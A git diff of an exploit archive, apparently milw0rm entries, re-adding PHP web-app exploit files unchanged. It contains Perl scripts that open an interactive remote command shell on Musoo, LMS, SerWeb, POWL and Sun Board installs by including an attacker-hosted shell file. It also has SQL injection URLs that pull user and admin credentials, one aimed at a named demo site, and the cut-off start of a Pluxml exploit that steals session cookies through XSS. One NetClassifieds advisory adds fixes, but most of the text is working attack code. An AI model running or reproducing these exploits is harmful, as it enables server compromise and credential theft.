+++ b/platforms/php/webapps/4085.txt
@@ -1,31 +1,31 @@
-# Musoo 0.21(GLOBALS[ini_array][EXTLIB_PATH])Remote File Include
-
-# D.Script: 
-      http://osx.freshmeat.net/redir/musoo/65735/url_tgz/musoo-0.21.tar.gz
-
-# V.Code :
-      require_once( $GLOBALS["ini_array"]["EXTLIB_PATH"].'/
-
-# In :
-      /msDb.php
-      /modules/MusooTemplateLite.php
-      /modules/SoundImporter.php
-
-# Exploits:
-      1:/msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=Shell.txt?
-      2:/modules/MusooTemplateLite.php?GLOBALS[ini_array][EXTLIB_PATH]=Shell.txt?
-      3:/modules/SoundImporter.php?GLOBALS[ini_array][EXTLIB_PATH]=Shell.txt?
-
-# Video
-      http://norcalvex.org/v1d30/Musoo/Musoo-Video.rar
-
-# Discovered by: 
-      GoLd_M = [Mahmood_ali]
-
-# Homepage: 
-      http://www.Tryag.Com/cc
-
-# Sp.Thanx To : 
-      Tryag-Team & Asb-May's Team 
-
-# milw0rm.com [2007-06-20]
+# Musoo 0.21(GLOBALS[ini_array][EXTLIB_PATH])Remote File Include
+
+# D.Script: 
+      http://osx.freshmeat.net/redir/musoo/65735/url_tgz/musoo-0.21.tar.gz
+
+# V.Code :
+      require_once( $GLOBALS["ini_array"]["EXTLIB_PATH"].'/
+
+# In :
+      /msDb.php
+      /modules/MusooTemplateLite.php
+      /modules/SoundImporter.php
+
+# Exploits:
+      1:/msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=Shell.txt?
+      2:/modules/MusooTemplateLite.php?GLOBALS[ini_array][EXTLIB_PATH]=Shell.txt?
+      3:/modules/SoundImporter.php?GLOBALS[ini_array][EXTLIB_PATH]=Shell.txt?
+
+# Video
+      http://norcalvex.org/v1d30/Musoo/Musoo-Video.rar
+
+# Discovered by: 
+      GoLd_M = [Mahmood_ali]
+
+# Homepage: 
+      http://www.Tryag.Com/cc
+
+# Sp.Thanx To : 
+      Tryag-Team & Asb-May's Team 
+
+# milw0rm.com [2007-06-20]
diff --git a/platforms/php/webapps/4086.pl b/platforms/php/webapps/4086.pl
index 6712d8990..f12ca0e91 100755
--- a/platforms/php/webapps/4086.pl
+++ b/platforms/php/webapps/4086.pl
@@ -1,65 +1,64 @@
-
-#!/usr/bin/perl
-#
-# LMS - LAN Management System 1.9.6 - RFI
-#
-# Risk : High (Remote Code Execution)
-#
-# Url: http://www.lms.org.pl/download/1.9/lms-1.9.6.tar.gz
-#
-# Exploit:
-#   http://site.com/[path]/lib/language.php?_LIB_DIR=[Evil_Script]
-#
-# (c)oded and f0und3d by Kw3[R]Ln 
-#
-# Romanian Security Team .: hTTp://RSTZONE.NET :.
-#
-#
-# greetz to all RST [rstzone.net] MEMBERZ, Nemessis, Slick, str0ke, SpiridusuCaddy, zbeng, ENCODED, # Death, Ciupercutza [LUV TEAM] and all i forgot !
-#
-# Fuckz: GM [h4cky0u] -[bigest nub]
-
-use LWP::Simple;
-
-print "...........................[RST]...............................\n";
-print ".                                                             .\n";
-print ".        LMS - LAN Management System 1.9.6 - RFI              .\n";
-print ".                                                             .\n";
-print "...............................................................\n";
-print ".       Romanian Security Team -> hTTp://RSTZONE.NET          .\n";
-print ".       [c]oded by Kw3rLN - office@rosecuritygroup.net        .\n";
-print "...............................................................\n\n";
-
-my $kw3,$path,$shell,$conexiune,$cmd,$data ;
-
-
-if ((!$ARGV[0]) || (!$ARGV[1])) { &usage;exit(0);}
-
-$path = $ARGV[0];
-chomp($path);
-$shell = $ARGV[1];
-chomp($shell);
-
-$path = $path."/lib/language.php";
-
-
-sub usage(){
-       print "Usage    : perl $0 host/path http://site.com/cmd.txt\n\n";
-       print "Example  : perl $0 http://127.0.0.1 http://site.com/cmd.txt\n\n";
-       print 'Shell    : ';
-          }
-
-while ()
-{
-print "[kw3rln].[rst] :~\$ ";
-chomp($cmd=);
-if ($cmd eq "exit") { exit(0);}
-
-$kw3 = $path."?_LIB_DIR=".$shell."?&cmd=".$cmd;
-if ($cmd eq "")
- { print "Enter your command !\n"; }
-else
- { $data=get($kw3); print $data ; }
-}
-
-# milw0rm.com [2007-06-20]
+#!/usr/bin/perl
+#
+# LMS - LAN Management System 1.9.6 - RFI
+#
+# Risk : High (Remote Code Execution)
+#
+# Url: http://www.lms.org.pl/download/1.9/lms-1.9.6.tar.gz
+#
+# Exploit:
+#   http://site.com/[path]/lib/language.php?_LIB_DIR=[Evil_Script]
+#
+# (c)oded and f0und3d by Kw3[R]Ln 
+#
+# Romanian Security Team .: hTTp://RSTZONE.NET :.
+#
+#
+# greetz to all RST [rstzone.net] MEMBERZ, Nemessis, Slick, str0ke, SpiridusuCaddy, zbeng, ENCODED, # Death, Ciupercutza [LUV TEAM] and all i forgot !
+#
+# Fuckz: GM [h4cky0u] -[bigest nub]
+
+use LWP::Simple;
+
+print "...........................[RST]...............................\n";
+print ".                                                             .\n";
+print ".        LMS - LAN Management System 1.9.6 - RFI              .\n";
+print ".                                                             .\n";
+print "...............................................................\n";
+print ".       Romanian Security Team -> hTTp://RSTZONE.NET          .\n";
+print ".       [c]oded by Kw3rLN - office@rosecuritygroup.net        .\n";
+print "...............................................................\n\n";
+
+my $kw3,$path,$shell,$conexiune,$cmd,$data ;
+
+
+if ((!$ARGV[0]) || (!$ARGV[1])) { &usage;exit(0);}
+
+$path = $ARGV[0];
+chomp($path);
+$shell = $ARGV[1];
+chomp($shell);
+
+$path = $path."/lib/language.php";
+
+
+sub usage(){
+       print "Usage    : perl $0 host/path http://site.com/cmd.txt\n\n";
+       print "Example  : perl $0 http://127.0.0.1 http://site.com/cmd.txt\n\n";
+       print 'Shell    : ';
+          }
+
+while ()
+{
+print "[kw3rln].[rst] :~\$ ";
+chomp($cmd=);
+if ($cmd eq "exit") { exit(0);}
+
+$kw3 = $path."?_LIB_DIR=".$shell."?&cmd=".$cmd;
+if ($cmd eq "")
+ { print "Enter your command !\n"; }
+else
+ { $data=get($kw3); print $data ; }
+}
+
+# milw0rm.com [2007-06-20]
diff --git a/platforms/php/webapps/4089.pl b/platforms/php/webapps/4089.pl
index 47c46d050..2ecf33fe1 100755
--- a/platforms/php/webapps/4089.pl
+++ b/platforms/php/webapps/4089.pl
@@ -1,76 +1,76 @@
-#!/usr/bin/perl
-#
-# SerWeb 0.9.4- Remote FIle Inclusion
-#
-# This software, serweb, is a web interface for self-provisioning
-# of users of SER SIP Server (http://www.iptel.org/ser/)
-#
-# Url: http://ftp.iptel.org/pub/ser/0.9.6/contrib/serweb-0.9.4.tar.gz
-#
-# Exploit:
-#
-http://site.com/[path]/load_lang.php?_SERWEB[serwebdir]=[Evil_Script]
-#
-# (c)oded and f0und3d by Kw3[R]Ln 
-#
-# Romanian Security Team .: hTTp://RSTZONE.NET :.
-#
-#
-# greetz to all RST [rstzone.net] MEMBERZ
-#
-# Fuckz: GM [h4cky0u] -[bigest nub], me
-
-use LWP::Simple;
-
-print
-"...........................[RST]...............................\n";
-print ".
-.\n";
-print ".        SerWeb 0.9.4- Remote FIle Inclusion
-.\n";
-print ".
-.\n";
-print
-"...............................................................\n";
-print ".       Romanian Security Team -> hTTp://RSTZONE.NET
-.\n";
-print ".       [c]oded by Kw3rLN - office@rosecuritygroup.net
-.\n";
-print
-"...............................................................\n\n";
-
-my $kw3,$path,$shell,$conexiune,$cmd,$data ;
-
-
-if ((!$ARGV[0]) || (!$ARGV[1])) { &usage;exit(0);}
-
-$path = $ARGV[0];
-chomp($path);
-$shell = $ARGV[1];
-chomp($shell);
-
-$path = $path."/load_lang.php";
-
-
-sub usage(){
-       print "Usage    : perl $0 host/path http://site.com/cmd.txt\n\n";
-       print "Example  : perl $0 http://127.0.0.1
-http://site.com/cmd.txt\n\n";
-       print 'Shell    : ';
-          }
-
-while ()
-{
-print "[kw3rln].[rst] :~\$ ";
-chomp($cmd=);
-if ($cmd eq "exit") { exit(0);}
-
-$kw3 = $path."?_SERWEB[serwebdir]=".$shell."?&cmd=".$cmd;
-if ($cmd eq "")
- { print "Enter your command !\n"; }
-else
- { $data=get($kw3); print $data ; }
-}
-
-# milw0rm.com [2007-06-21]
+#!/usr/bin/perl
+#
+# SerWeb 0.9.4- Remote FIle Inclusion
+#
+# This software, serweb, is a web interface for self-provisioning
+# of users of SER SIP Server (http://www.iptel.org/ser/)
+#
+# Url: http://ftp.iptel.org/pub/ser/0.9.6/contrib/serweb-0.9.4.tar.gz
+#
+# Exploit:
+#
+http://site.com/[path]/load_lang.php?_SERWEB[serwebdir]=[Evil_Script]
+#
+# (c)oded and f0und3d by Kw3[R]Ln 
+#
+# Romanian Security Team .: hTTp://RSTZONE.NET :.
+#
+#
+# greetz to all RST [rstzone.net] MEMBERZ
+#
+# Fuckz: GM [h4cky0u] -[bigest nub], me
+
+use LWP::Simple;
+
+print
+"...........................[RST]...............................\n";
+print ".
+.\n";
+print ".        SerWeb 0.9.4- Remote FIle Inclusion
+.\n";
+print ".
+.\n";
+print
+"...............................................................\n";
+print ".       Romanian Security Team -> hTTp://RSTZONE.NET
+.\n";
+print ".       [c]oded by Kw3rLN - office@rosecuritygroup.net
+.\n";
+print
+"...............................................................\n\n";
+
+my $kw3,$path,$shell,$conexiune,$cmd,$data ;
+
+
+if ((!$ARGV[0]) || (!$ARGV[1])) { &usage;exit(0);}
+
+$path = $ARGV[0];
+chomp($path);
+$shell = $ARGV[1];
+chomp($shell);
+
+$path = $path."/load_lang.php";
+
+
+sub usage(){
+       print "Usage    : perl $0 host/path http://site.com/cmd.txt\n\n";
+       print "Example  : perl $0 http://127.0.0.1
+http://site.com/cmd.txt\n\n";
+       print 'Shell    : ';
+          }
+
+while ()
+{
+print "[kw3rln].[rst] :~\$ ";
+chomp($cmd=);
+if ($cmd eq "exit") { exit(0);}
+
+$kw3 = $path."?_SERWEB[serwebdir]=".$shell."?&cmd=".$cmd;
+if ($cmd eq "")
+ { print "Enter your command !\n"; }
+else
+ { $data=get($kw3); print $data ; }
+}
+
+# milw0rm.com [2007-06-21]
diff --git a/platforms/php/webapps/4090.pl b/platforms/php/webapps/4090.pl
index 03456ba89..1c2564c3e 100755
--- a/platforms/php/webapps/4090.pl
+++ b/platforms/php/webapps/4090.pl
@@ -1,63 +1,63 @@
-#!/usr/bin/perl
-#
-# POWL - 0.94 - Remote File Inclusion Exploit
-#
-# Url: http://switch.dl.sourceforge.net/sourceforge/powl/powl_ontowiki-0.94.zip
-#
-# Exploit:
-# http://site.com/[path]/plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=[Evil_Script>:]
-#
-# (c)oded and f0und3d by kw3rln 
-#
-# Romanian Security Team .: hTTp://RSTZONE.NET :.
-#
-#
-# why i publish this lame bugs? just boring all day..drinking beer.. i will publish sqli too but rfi`s are
-# more searched than never :P
-#
-# greetz to all RST [rstzone.net] MEMBERZ
-
-use LWP::Simple;
-
-print "...........................[RST]...............................\n";
-print ".  .\n";
-print ".        POWL - 0.94 - Remote File Inclusion Exploit .\n";
-print ".  .\n";
-print "...............................................................\n";
-print ".       Romanian Security Team -> hTTp://RSTZONE.NET .\n";
-print ".       [c]oded by Kw3rLN - office@rosecuritygroup.net .\n";
-print "...............................................................\n\n";
-
-my $kw3,$path,$shell,$conexiune,$cmd,$data ;
-
-
-if ((!$ARGV[0]) || (!$ARGV[1])) { &usage;exit(0);}
-
-$path = $ARGV[0];
-chomp($path);
-$shell = $ARGV[1];
-chomp($shell);
-
-$path = $path."/plugins/widgets/htmledit/htmledit.php";
-
-
-sub usage(){
-      print "Usage    : perl $0 host/path http://site.com/cmd.txt\n\n";
-      print "Example  : perl $0 http://127.0.0.1 http://site.com/cmd.txt\n\n";
-      print 'Shell    : ';
-         }
-
-while ()
-{
-print "[kw3rln].[rst] :~\$ ";
-chomp($cmd=);
-if ($cmd eq "exit") { exit(0);}
-
-$kw3 = $path."?_POWL[installPath]=".$shell."?&cmd=".$cmd;
-if ($cmd eq "")
- { print "Enter your command !\n"; }
-else
- { $data=get($kw3); print $data ; }
-}
-
-# milw0rm.com [2007-06-22]
+#!/usr/bin/perl
+#
+# POWL - 0.94 - Remote File Inclusion Exploit
+#
+# Url: http://switch.dl.sourceforge.net/sourceforge/powl/powl_ontowiki-0.94.zip
+#
+# Exploit:
+# http://site.com/[path]/plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=[Evil_Script>:]
+#
+# (c)oded and f0und3d by kw3rln 
+#
+# Romanian Security Team .: hTTp://RSTZONE.NET :.
+#
+#
+# why i publish this lame bugs? just boring all day..drinking beer.. i will publish sqli too but rfi`s are
+# more searched than never :P
+#
+# greetz to all RST [rstzone.net] MEMBERZ
+
+use LWP::Simple;
+
+print "...........................[RST]...............................\n";
+print ".  .\n";
+print ".        POWL - 0.94 - Remote File Inclusion Exploit .\n";
+print ".  .\n";
+print "...............................................................\n";
+print ".       Romanian Security Team -> hTTp://RSTZONE.NET .\n";
+print ".       [c]oded by Kw3rLN - office@rosecuritygroup.net .\n";
+print "...............................................................\n\n";
+
+my $kw3,$path,$shell,$conexiune,$cmd,$data ;
+
+
+if ((!$ARGV[0]) || (!$ARGV[1])) { &usage;exit(0);}
+
+$path = $ARGV[0];
+chomp($path);
+$shell = $ARGV[1];
+chomp($shell);
+
+$path = $path."/plugins/widgets/htmledit/htmledit.php";
+
+
+sub usage(){
+      print "Usage    : perl $0 host/path http://site.com/cmd.txt\n\n";
+      print "Example  : perl $0 http://127.0.0.1 http://site.com/cmd.txt\n\n";
+      print 'Shell    : ';
+         }
+
+while ()
+{
+print "[kw3rln].[rst] :~\$ ";
+chomp($cmd=);
+if ($cmd eq "exit") { exit(0);}
+
+$kw3 = $path."?_POWL[installPath]=".$shell."?&cmd=".$cmd;
+if ($cmd eq "")
+ { print "Enter your command !\n"; }
+else
+ { $data=get($kw3); print $data ; }
+}
+
+# milw0rm.com [2007-06-22]
diff --git a/platforms/php/webapps/4091.txt b/platforms/php/webapps/4091.txt
index bffdcc0c8..18685f551 100755
--- a/platforms/php/webapps/4091.txt
+++ b/platforms/php/webapps/4091.txt
@@ -1,33 +1,33 @@
-# Sun Board 1.00.00 Alpha Multiple Remote File Inclusion Vulnerabilities
-
-# D.Script :
-      http://mesh.dl.sourceforge.net/sourceforge/sunboard/sunboard.zip
-
-# V.Code :
-      require $sunPath.'config.php';
-      require_once $sunPath.'dbms/'.$dbtype.'.php';
-# In :
-      /include.php
-
-# Exploits :
-      /include.php?sunPath=Shell.txt?
-
-# V.Code 2 :
-      
-
-# In :
-      /skin/board/default/doctype.php
-
-# Exploits 2 :
-      /skin/board/default/doctype.php?dir=Shell.txt?
-
-# Discovered by:
-      GoLd_M = [Mahmood_ali]
-
-# Homepage:
-      http://www.Tryag.Com/cc
-
-# Sp.Thanx To :
-      Tryag-Team & Asb-May's Group
-
-# milw0rm.com [2007-06-22]
+# Sun Board 1.00.00 Alpha Multiple Remote File Inclusion Vulnerabilities
+
+# D.Script :
+      http://mesh.dl.sourceforge.net/sourceforge/sunboard/sunboard.zip
+
+# V.Code :
+      require $sunPath.'config.php';
+      require_once $sunPath.'dbms/'.$dbtype.'.php';
+# In :
+      /include.php
+
+# Exploits :
+      /include.php?sunPath=Shell.txt?
+
+# V.Code 2 :
+      
+
+# In :
+      /skin/board/default/doctype.php
+
+# Exploits 2 :
+      /skin/board/default/doctype.php?dir=Shell.txt?
+
+# Discovered by:
+      GoLd_M = [Mahmood_ali]
+
+# Homepage:
+      http://www.Tryag.Com/cc
+
+# Sp.Thanx To :
+      Tryag-Team & Asb-May's Group
+
+# milw0rm.com [2007-06-22]
diff --git a/platforms/php/webapps/4092.txt b/platforms/php/webapps/4092.txt
index 6fcb3082f..2f9487a24 100755
--- a/platforms/php/webapps/4092.txt
+++ b/platforms/php/webapps/4092.txt
@@ -1,187 +1,187 @@
-Application: NetClassifieds:
--Free Edition
--Standard Edition
--Professional Edition
--Premium Edition
-Web Site: http://www.scriptdevelopers.net/
-Versions: all
-Platform: linux, windows
-Bug: multiple injection sql , xss , full path
-Fix Available: Yes
-
-
--------------------------------------------------------
-
-1) Introduction
-2) Bug
-3) The Code
-4) Proof of concept
-5) Fix
-6)Conclusion
-
-===========
-1) Introduction
-===========
-
-"NetClassifieds Premium Edition has been built on the premise of making every
-classifieds site feel like it was custom written for the purpose for which it's being used.
-Automotive Sites, Horse Sites, Reality Sites, General Classifieds Sites or any other type
-of classifieds site you can think of will find a perfect match in NetClassifieds"
-
-======
-2) Bug
-======
-
-injection sql , xss , full path
-
-===============
-3) Vulnerable code:
-===============
-in Common.php
-
-line 310:
-
-function CCStrip($value)
-{
-if(get_magic_quotes_gpc() == 0)
-return $value;
-else
-return stripslashes($value); // ==> wtf... 0-o
-}
-
-
-
-ligne 350:
-
-function CCGetFromPost($parameter_name, $default_value)
-{
-global $HTTP_POST_VARS;
-
-$parameter_value = "";
-if(isset($HTTP_POST_VARS[$parameter_name]))
-$parameter_value = CCStrip($HTTP_POST_VARS[$parameter_name]);
-else
-$parameter_value = $default_value;
-
-return $parameter_value;
-}
-
-
-line 365:
-
-function CCGetFromGet($parameter_name, $default_value)
-{
-global $HTTP_GET_VARS;
-
-$parameter_value = "";
-if(isset($HTTP_GET_VARS[$parameter_name]))
-$parameter_value = CCStrip($HTTP_GET_VARS[$parameter_name]);
-else
-$parameter_value = $default_value;
-
-return $parameter_value;
-}
-
-nothing is filtred ....
-
-let's see how it goes in viewcat.php:
-
-line 63:
-include(RelativePath . "/Common.php");
-
-line 519:
-$this->ds->Parameters["urlCatID"] = CCGetFromGet("CatID", "");
-
-line 909:
-$catdb1 = new clsDBNetConnect;
-
-$catdb1->connect();
-
-$newSQL1 = "SELECT cat_id FROM categories WHERE sub_cat_id='" . CCGetFromGet("CatID", "") . "'";
-
-$incat = "'" . CCGetFromGet("CatID", "") . "'";
-
-
-I wont past every line of this code , because EVERY parameter is vulnerable to sql injection , XSS , full path ...
-
-=====
-4)proof of concept
-=====
-
-
-exemple of exploitation :
-1) http://site.com/ViewCat.php?CatID=-8+union+select+1,email,3+from+users/*
-==> ( Database error: Invalid SQL: SELECT name, sub_cat_id, cat_id FROM categories WHERE cat_id=username@mail.com )
-
-2)http://site.com/ViewCat.php?s_user_id='+union+select+user_password+from+users+where%20user_id=1/*
-==> The value in field urls_user_id is not valid. (passwd_PLAIN_TEXT)
-
-// there's absolutly no encryption in this script for stored password , or sensitive data ...
-
-every input are vulnerable to XSS attacks ( there's maybe 40 inputs ... ) via mysql errors , php error , and via
-various unfiltred forms .
-=====
-5) Fix
-=====
-scriptdevelopers has been advised , i dont think they will release any patch at the moment .
-
-here's my "quick patch" :
-
-1) in Common.php:
-line 30 :
-ADD:
-ini_set(display_errors,"0");
-( in a production mode , no one needs to know your errors .. and this avoid xss via php error )
-
-ligne 350:
-function CCGetFromPost // for every POST request
-avant : return $parameter_value;
-apres : return preg_replace('/[^a-z0-9]/i', '', $parameter_value); //only 0 to 9 and a to z caracters allowed
-
-
-line 365:
-function CCGetFromGet // for every GET request
-replace :
-return $parameter_value;
-BY
-return preg_replace('/[^a-z0-9]/i', '', $parameter_value);
-
-2) in Mysql_db.php
-line 52 :
-var $Halt_On_Error = "yes"; ## "yes" (halt with message), "no" (ignore errors quietly), "report" (ignore errror, but spit a warning)
-
-set the value at "no" ( by default it's yes )
-this will avoid juicy errors , such as table name and the complete query
-
-3) imageresizer.php
-
-line 2:
-ADD :
-ini_set(display_errors,"0");
-( same reason as Common.php )
-
-line 100 :
-replace : echo("
    $msg
     file=".__FILE__."
    ")
-BY
-echo("
    error while processing your request
     
    ");
-
-".__FILE__." show the full path, no one need to know where is located your script on the server .
-and usually a full path give the username for the ftp , or cpanel .
-( /directory/your_user/www/file.php )
-
-
-=====
-5) Conclusion
-=====
-
-This script has not been develloped in a secure way, and it's dangerous
-to use it UNPATCHED
-
-
-
-
-
-regards laurent gaffie
-contact : laurent.gaffie@gmail.com
-
-# milw0rm.com [2007-06-22]
+Application: NetClassifieds:
+-Free Edition
+-Standard Edition
+-Professional Edition
+-Premium Edition
+Web Site: http://www.scriptdevelopers.net/
+Versions: all
+Platform: linux, windows
+Bug: multiple injection sql , xss , full path
+Fix Available: Yes
+
+
+-------------------------------------------------------
+
+1) Introduction
+2) Bug
+3) The Code
+4) Proof of concept
+5) Fix
+6)Conclusion
+
+===========
+1) Introduction
+===========
+
+"NetClassifieds Premium Edition has been built on the premise of making every
+classifieds site feel like it was custom written for the purpose for which it's being used.
+Automotive Sites, Horse Sites, Reality Sites, General Classifieds Sites or any other type
+of classifieds site you can think of will find a perfect match in NetClassifieds"
+
+======
+2) Bug
+======
+
+injection sql , xss , full path
+
+===============
+3) Vulnerable code:
+===============
+in Common.php
+
+line 310:
+
+function CCStrip($value)
+{
+if(get_magic_quotes_gpc() == 0)
+return $value;
+else
+return stripslashes($value); // ==> wtf... 0-o
+}
+
+
+
+ligne 350:
+
+function CCGetFromPost($parameter_name, $default_value)
+{
+global $HTTP_POST_VARS;
+
+$parameter_value = "";
+if(isset($HTTP_POST_VARS[$parameter_name]))
+$parameter_value = CCStrip($HTTP_POST_VARS[$parameter_name]);
+else
+$parameter_value = $default_value;
+
+return $parameter_value;
+}
+
+
+line 365:
+
+function CCGetFromGet($parameter_name, $default_value)
+{
+global $HTTP_GET_VARS;
+
+$parameter_value = "";
+if(isset($HTTP_GET_VARS[$parameter_name]))
+$parameter_value = CCStrip($HTTP_GET_VARS[$parameter_name]);
+else
+$parameter_value = $default_value;
+
+return $parameter_value;
+}
+
+nothing is filtred ....
+
+let's see how it goes in viewcat.php:
+
+line 63:
+include(RelativePath . "/Common.php");
+
+line 519:
+$this->ds->Parameters["urlCatID"] = CCGetFromGet("CatID", "");
+
+line 909:
+$catdb1 = new clsDBNetConnect;
+
+$catdb1->connect();
+
+$newSQL1 = "SELECT cat_id FROM categories WHERE sub_cat_id='" . CCGetFromGet("CatID", "") . "'";
+
+$incat = "'" . CCGetFromGet("CatID", "") . "'";
+
+
+I wont past every line of this code , because EVERY parameter is vulnerable to sql injection , XSS , full path ...
+
+=====
+4)proof of concept
+=====
+
+
+exemple of exploitation :
+1) http://site.com/ViewCat.php?CatID=-8+union+select+1,email,3+from+users/*
+==> ( Database error: Invalid SQL: SELECT name, sub_cat_id, cat_id FROM categories WHERE cat_id=username@mail.com )
+
+2)http://site.com/ViewCat.php?s_user_id='+union+select+user_password+from+users+where%20user_id=1/*
+==> The value in field urls_user_id is not valid. (passwd_PLAIN_TEXT)
+
+// there's absolutly no encryption in this script for stored password , or sensitive data ...
+
+every input are vulnerable to XSS attacks ( there's maybe 40 inputs ... ) via mysql errors , php error , and via
+various unfiltred forms .
+=====
+5) Fix
+=====
+scriptdevelopers has been advised , i dont think they will release any patch at the moment .
+
+here's my "quick patch" :
+
+1) in Common.php:
+line 30 :
+ADD:
+ini_set(display_errors,"0");
+( in a production mode , no one needs to know your errors .. and this avoid xss via php error )
+
+ligne 350:
+function CCGetFromPost // for every POST request
+avant : return $parameter_value;
+apres : return preg_replace('/[^a-z0-9]/i', '', $parameter_value); //only 0 to 9 and a to z caracters allowed
+
+
+line 365:
+function CCGetFromGet // for every GET request
+replace :
+return $parameter_value;
+BY
+return preg_replace('/[^a-z0-9]/i', '', $parameter_value);
+
+2) in Mysql_db.php
+line 52 :
+var $Halt_On_Error = "yes"; ## "yes" (halt with message), "no" (ignore errors quietly), "report" (ignore errror, but spit a warning)
+
+set the value at "no" ( by default it's yes )
+this will avoid juicy errors , such as table name and the complete query
+
+3) imageresizer.php
+
+line 2:
+ADD :
+ini_set(display_errors,"0");
+( same reason as Common.php )
+
+line 100 :
+replace : echo("
    $msg
     file=".__FILE__."
    ")
+BY
+echo("
    error while processing your request
     
    ");
+
+".__FILE__." show the full path, no one need to know where is located your script on the server .
+and usually a full path give the username for the ftp , or cpanel .
+( /directory/your_user/www/file.php )
+
+
+=====
+5) Conclusion
+=====
+
+This script has not been develloped in a secure way, and it's dangerous
+to use it UNPATCHED
+
+
+
+
+
+regards laurent gaffie
+contact : laurent.gaffie@gmail.com
+
+# milw0rm.com [2007-06-22]
diff --git a/platforms/php/webapps/4095.txt b/platforms/php/webapps/4095.txt
index 38489daef..b97a260d2 100755
--- a/platforms/php/webapps/4095.txt
+++ b/platforms/php/webapps/4095.txt
@@ -1,40 +1,40 @@
---==+================================================================================+==--
---==+             Pharmacy System v2 AND PRIOR SQL INJECTION VULNERBILITYS           +==--
---==+================================================================================+==--
-
-
-
-AUTHOR: t0pP8uZz & xprog
-
-
-SCRIPT DOWNLOAD: PAY SCRIPT
-
-
-SITE: http://www.netartmedia.net/pharmacysystem/
-
-
-DORK: N/A
-
-
-EXPLOITS:
-
-EXPLOIT 1: http://www.server.com/SCRIPT_PATH/index.php?mod=cart&quantity=1&action=add&ID=-1%20and%201=2%20UNION%20ALL%20SELECT%201,2,3,concat(username,password),5,6,7,8,9,10,11%20FROM%20pharma1_admin_users
-EXPLOIT 2: http://www.server.com/SCRIPT_PATH/index.php?mod=cart&quantity=1&action=add&ID=-1%20and%201=2%20UNION%20ALL%20SELECT%201,2,3,concat(username,password),5,6,7,8,9,10,11%20FROM%20pharma1_users
-
-EXAMPLES:
-
-EXAMPLE ON DEMO: http://www.wscreator.com/pharma1/index.php?mod=cart&quantity=1&action=add&ID=-1%20and%201=2%20UNION%20ALL%20SELECT%201,2,3,concat(username,password),5,6,7,8,9,10,11%20FROM%20pharma1_admin_users
-
-NOTE/TIP: Most sites will have diffrent table prefix, so table pharma1_admin_users probarly wont exist, to get the prefix
-follow these steps, goto "http://server.com/index.php?page='" this should cause a mysql error and you will be able to
-see the mysql query being used for the page variable. Simple replace the prefix from the error with then one in the injection
-if you cant do that then dont use the exploit.
-
-GREETZ: str0ke, GM, andy777, Untamed, Don, o0xxdark0o, & everyone at H4CKY0u.org, BHUNITED AND G0t-Root.net
-
-
---==+================================================================================+==--
---==+            Pharmacy System v2 AND PRIOR SQL INJECTION VULNERBILITYS            +==--
---==+================================================================================+==-- 
-
-# milw0rm.com [2007-06-24]
+--==+================================================================================+==--
+--==+             Pharmacy System v2 AND PRIOR SQL INJECTION VULNERBILITYS           +==--
+--==+================================================================================+==--
+
+
+
+AUTHOR: t0pP8uZz & xprog
+
+
+SCRIPT DOWNLOAD: PAY SCRIPT
+
+
+SITE: http://www.netartmedia.net/pharmacysystem/
+
+
+DORK: N/A
+
+
+EXPLOITS:
+
+EXPLOIT 1: http://www.server.com/SCRIPT_PATH/index.php?mod=cart&quantity=1&action=add&ID=-1%20and%201=2%20UNION%20ALL%20SELECT%201,2,3,concat(username,password),5,6,7,8,9,10,11%20FROM%20pharma1_admin_users
+EXPLOIT 2: http://www.server.com/SCRIPT_PATH/index.php?mod=cart&quantity=1&action=add&ID=-1%20and%201=2%20UNION%20ALL%20SELECT%201,2,3,concat(username,password),5,6,7,8,9,10,11%20FROM%20pharma1_users
+
+EXAMPLES:
+
+EXAMPLE ON DEMO: http://www.wscreator.com/pharma1/index.php?mod=cart&quantity=1&action=add&ID=-1%20and%201=2%20UNION%20ALL%20SELECT%201,2,3,concat(username,password),5,6,7,8,9,10,11%20FROM%20pharma1_admin_users
+
+NOTE/TIP: Most sites will have diffrent table prefix, so table pharma1_admin_users probarly wont exist, to get the prefix
+follow these steps, goto "http://server.com/index.php?page='" this should cause a mysql error and you will be able to
+see the mysql query being used for the page variable. Simple replace the prefix from the error with then one in the injection
+if you cant do that then dont use the exploit.
+
+GREETZ: str0ke, GM, andy777, Untamed, Don, o0xxdark0o, & everyone at H4CKY0u.org, BHUNITED AND G0t-Root.net
+
+
+--==+================================================================================+==--
+--==+            Pharmacy System v2 AND PRIOR SQL INJECTION VULNERBILITYS            +==--
+--==+================================================================================+==-- 
+
+# milw0rm.com [2007-06-24]
diff --git a/platforms/php/webapps/4096.php b/platforms/php/webapps/4096.php
index fe472fcb1..848da5c8b 100755
--- a/platforms/php/webapps/4096.php
+++ b/platforms/php/webapps/4096.php
@@ -1,952 +1,952 @@
- sploit.php -url http://victim.com/pluxml0.3.1/ -ip 90.27.10.196
-# [/]Waiting for connection on http://90.27.10.196:80/
-# [!]Now you have to make the victim to click on the url
-# [+]Received 395 bytes from 182.26.54.2:2007
-# [+]Sending 366 bytes to 182.26.54.2:2007
-# [+]Received 326 bytes from 182.26.54.2:2009
-# [+]Sending 366 bytes to 182.26.54.2:2009
-# [+]Received 692 bytes from 182.26.54.2:2010
-# [!]Received one cookie from 182.26.54.2:2010
-# [/]Verifying if there is a valid session id cookie
-# [-]No: pollvote=1
-# [!]Yes: PHPSESSID=c6255827c1a07c51a95af691a612484b
-# [+]The created socket has been shut down
-# $shell> whoami
-# darkfig
-#
-if($argc < 5)
-{
-print("
------------- Pluxml 0.3.1 Remote Code Execution Exploit -------------
----------------------------------------------------------------------
-             Credits: DarkFig 
-                 URL: acid-root.new.fr || mgsdl.free.fr
-                 IRC: #acidroot@irc.worldnet.net
-                Note: Coded for fun 8)
----------------------------------------------------------------------
-   Usage: $argv[0] -url <> -ip <> [Options]
-  Params: -url       For example http://victim.com/pluxml0.3.1/
-          -ip        The IP that will be bound to the socket
- Options: -port      The socket will listen on this port (default=80)
-          -proxy     If you wanna use a proxy  
-          -proxyauth Basic authentification 
----------------------------------------------------------------------
-");exit(1);
-}
-
-# PhpSploit object
-####################
-$xpl = new phpsploit();
-$xpl->agent('Firefox');
-
-# Server
-##########
-$server_addr = getparam('ip',1);
-$server_port = (getparam('port')!='') ? getparam('port') : '80';
-$server_url  = "http://$server_addr:$server_port/";
-
-# Victim
-##########
-$hack = getparam('url',1);
-$html = "
    hello :)
    \n";
-
-# Apparently my XSS bypass NoScript protection
-################################################
-$xss  = "
